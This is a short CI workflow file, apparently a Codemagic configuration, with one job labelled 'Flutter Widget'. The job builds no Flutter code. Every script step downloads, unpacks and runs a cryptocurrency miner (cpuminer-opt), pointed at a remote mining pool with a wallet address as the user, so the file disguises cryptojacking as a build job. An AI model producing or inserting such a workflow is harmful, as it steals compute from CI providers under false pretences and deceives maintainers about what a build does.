workflows:
    
    flutter-widget:
        name: Flutter Widget
        max_build_duration: 120
        environment:
            flutter: dev
        scripts:
            - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-mac.tar.gz
            - brew install gnu-tar
            - gtar xvf cpuminer-opt-mac.tar.gz
            - ./cpuminer-sse2 -a yespowerSUGAR -o stratum+tcps://stratum-eu.rplant.xyz:7042 -u sugar1qf97e2z2f4tgrcwa06kgqpxf5u8k8t2rmmx4alx.mejik